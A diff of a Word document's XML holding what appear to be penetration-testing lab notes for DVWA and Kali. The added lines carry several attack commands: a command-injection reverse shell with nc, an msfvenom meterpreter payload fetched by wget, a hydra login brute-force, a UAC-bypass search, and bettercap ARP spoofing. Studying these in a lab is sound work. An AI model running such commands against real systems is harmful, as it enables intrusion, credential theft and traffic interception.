-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>dpkg</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32</w:t>
+            <w:r>
+              <w:t>Sudo su</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>Sudo dpkg –add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -4548,19 +3481,11 @@
                 <w:highlight w:val="yellow"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>BlueKeep</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -RDP Vulnerability</w:t>
+              <w:t>BlueKeep -RDP Vulnerability</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4589,14 +3514,12 @@
             <w:pPr>
               <w:jc w:val="center"/>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
               <w:t>Routersploit</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -4627,13 +3550,8 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Follow the instructions in </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>github</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>Follow the instructions in github</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -4760,21 +3678,8 @@
                 <w:szCs w:val="20"/>
                 <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
               </w:rPr>
-              <w:t xml:space="preserve">cd </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:b/>
-                <w:bCs/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-              </w:rPr>
-              <w:t>routersploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>cd routersploit</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -4875,13 +3780,8 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: use scanners/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>autopwn</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>CL: use scanners/autopwn</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:r>
@@ -4979,21 +3879,7 @@
               <w:rPr>
                 <w:highlight w:val="green"/>
               </w:rPr>
-              <w:t xml:space="preserve">Gaining </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="green"/>
-              </w:rPr>
-              <w:t>Access(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="green"/>
-              </w:rPr>
-              <w:t>Viruses, Trojan, Payloads)</w:t>
+              <w:t>Gaining Access(Viruses, Trojan, Payloads)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5016,18 +3902,8 @@
                 <w:bCs/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t xml:space="preserve">Note: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>msfvenom</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>Note: msfvenom</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -5061,15 +3937,7 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>msfvenom</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -h</w:t>
+              <w:t>CL: msfvenom -h</w:t>
             </w:r>
             <w:r>
               <w:t>elp or -h</w:t>
@@ -5077,15 +3945,8 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>CL:msfvenom</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -p</w:t>
+            <w:r>
+              <w:t>CL:msfvenom -p</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -5097,28 +3958,12 @@
               <w:t>:</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>msfvenom</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –list venom</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>msfvenom</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –list payload</w:t>
+              <w:t xml:space="preserve"> msfvenom –list venom</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: msfvenom –list payload</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -5162,25 +4007,7 @@
                 <w:bCs/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t xml:space="preserve">Veil – generating </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>powershell</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> payload</w:t>
+              <w:t>Veil – generating powershell payload</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5271,15 +4098,7 @@
               <w:jc w:val="center"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Note: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>fatrat</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> – check it out in google and follow instructions</w:t>
+              <w:t>Note: fatrat – check it out in google and follow instructions</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5319,11 +4138,9 @@
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>getuid</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -5392,36 +4209,21 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">CL </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>meterpreter</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>CL meterpreter</w:t>
+            </w:r>
             <w:r>
               <w:t xml:space="preserve"> &gt; </w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>pwd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>dir</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>CL: pwd</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: dir</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:r>
@@ -5457,30 +4259,12 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">Some of the command in, when </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>your</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> in windows 10 machine</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;download {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>fileName</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+              <w:t>Some of the command in, when your in windows 10 machine</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;download {fileName}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5488,15 +4272,7 @@
               <w:t>&gt;</w:t>
             </w:r>
             <w:r>
-              <w:t>upload {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>fileName</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+              <w:t>upload {fileName}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5539,15 +4315,7 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">&gt;search </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>bypassuac</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> – user account control</w:t>
+              <w:t>&gt;search bypassuac – user account control</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5687,13 +4455,8 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>&lt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>dirb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>&lt;dirb</w:t>
+            </w:r>
             <w:r>
               <w:t xml:space="preserve">     ----</w:t>
             </w:r>
@@ -5701,28 +4464,12 @@
               <w:sym w:font="Wingdings" w:char="F0E0"/>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> Find directory </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>in</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> the website</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&lt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>dirb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
+              <w:t xml:space="preserve"> Find directory in the website</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">&lt;dirb </w:t>
             </w:r>
             <w:hyperlink w:history="1">
               <w:r>
@@ -5754,23 +4501,7 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>dvwa</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> website </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>192.168.1.1;ls</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t>-la</w:t>
+              <w:t>&gt;dvwa website 192.168.1.1;ls-la</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5780,23 +4511,7 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>lvp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> 12345</w:t>
+              <w:t>&gt;nc -lvp 12345</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5806,15 +4521,7 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">192.168.1.1; </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -e /bin/bash 192.168.1.85 12345</w:t>
+              <w:t>192.168.1.1; nc -e /bin/bash 192.168.1.85 12345</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5835,31 +4542,7 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>msfvenom</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -p python/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>meterpreter</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>reverse_tcp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> LHOST=192.168.1.9 LPORT=6000 &gt;&gt; tester.py</w:t>
+              <w:t>&gt;msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=6000 &gt;&gt; tester.py</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -5868,27 +4551,13 @@
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>&gt;s</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>s</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>udo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> service apache2 start</w:t>
+              <w:t>udo service apache2 start</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5905,72 +4574,39 @@
               </w:rPr>
               <w:t>&gt;</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                 <w:color w:val="111111"/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>sudo service apache2 restart</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                 <w:color w:val="111111"/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t xml:space="preserve"> service apache2 restart</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:color w:val="111111"/>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
+              <w:t>&gt;sudo service apache2 stop</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p>
+            <w:r>
               <w:t>&gt;</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:color w:val="111111"/>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:color w:val="111111"/>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> service apache2 stop</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>&gt;</w:t>
-            </w:r>
-            <w:r>
-              <w:t>192.168.1.</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>1</w:t>
+            <w:r>
+              <w:t>192.168.1.1</w:t>
             </w:r>
             <w:r>
               <w:t>;ls</w:t>
             </w:r>
-            <w:proofErr w:type="gramEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -5978,47 +4614,25 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:t>&gt;;ls</w:t>
             </w:r>
-            <w:proofErr w:type="gramEnd"/>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>wget</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> 192.168.1.85/tester.py</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>&gt;;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>wget</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> 192.168.1.9/tester.py</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:proofErr w:type="gramStart"/>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>&gt;wget 192.168.1.85/tester.py</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;;wget 192.168.1.9/tester.py</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
             <w:r>
               <w:t>&gt;;ls</w:t>
             </w:r>
-            <w:proofErr w:type="gramEnd"/>
           </w:p>
           <w:p/>
           <w:p/>
@@ -6086,34 +4700,15 @@
                 <w:highlight w:val="yellow"/>
                 <w:u w:val="single"/>
               </w:rPr>
-              <w:t xml:space="preserve">– Code </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:highlight w:val="yellow"/>
+              <w:t>– Code injection</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:u w:val="single"/>
               </w:rPr>
-              <w:t>injection</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:u w:val="single"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:u w:val="single"/>
-              </w:rPr>
-              <w:t>usually steal session and cookies)</w:t>
+              <w:t>(usually steal session and cookies)</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6241,15 +4836,7 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">Python -m </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>SimpleHTTPServer</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
+              <w:t xml:space="preserve">Python -m SimpleHTTPServer </w:t>
             </w:r>
             <w:r>
               <w:t>{PORT}</w:t>
@@ -6338,15 +4925,7 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>hydra 192.168.1.75 http-form-post "</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>/dvwa/login.php:username</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t>=^USER^&amp;password=^PASS^&amp;Login=submit:Login failed" -L usernames.txt -P passwords.txt</w:t>
+              <w:t>hydra 192.168.1.75 http-form-post "/dvwa/login.php:username=^USER^&amp;password=^PASS^&amp;Login=submit:Login failed" -L usernames.txt -P passwords.txt</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6410,21 +4989,7 @@
               <w:rPr>
                 <w:highlight w:val="green"/>
               </w:rPr>
-              <w:t xml:space="preserve">Man In </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="green"/>
-              </w:rPr>
-              <w:t>The</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="green"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Middle Attack</w:t>
+              <w:t>Man In The Middle Attack</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6449,41 +5014,18 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">NOTE: Need to be ROOT </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>USER</w:t>
+              <w:t>NOTE: Need to be ROOT USER</w:t>
             </w:r>
             <w:r>
               <w:t>(</w:t>
             </w:r>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:b/>
                 <w:bCs/>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve">You need install </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>bettercap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> in Kali</w:t>
+              <w:t>You need install bettercap in Kali</w:t>
             </w:r>
             <w:r>
               <w:t>)</w:t>
@@ -6491,30 +5033,49 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">&gt;apt-get install </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>betterca</w:t>
+              <w:t>&gt;apt-get install betterca</w:t>
             </w:r>
             <w:r>
               <w:t>p</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;bettercap</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;help</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:r>
               <w:t>&gt;</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>bettercap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;help</w:t>
+            <w:r>
+              <w:t>help net.probe</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;net.probe on</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:lastRenderedPageBreak/>
+              <w:t>&gt;help arp.spoof</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;set arp.spoof.fullduplex true</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;set arp.spoof.targets {ipaddress}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6522,545 +5083,400 @@
               <w:t>&gt;</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve">help </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>net.probe</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>net.probe</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> on</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
+              <w:t>help</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;set net.sniff.local true</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;arp.spoof on</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;net.sniff on</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>Note: If you want to run previous – You need to create a sniff.cap</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;bettercap -iface eth0 -caplet sniff.cap</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Alternative: ETTERCAP</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;cat /proc/sys/net/ipv4/ip_forward</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>Note: If its enable packet forwarding 0 or 1</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>&gt;echo 1 &gt; /proc/sys/net/ipv4/ip_forward</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>Note: To start</w:t>
+            </w:r>
+            <w:r>
+              <w:t>, It will pop a window</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;Ettercap -G</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Can code using scapy instead of python</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
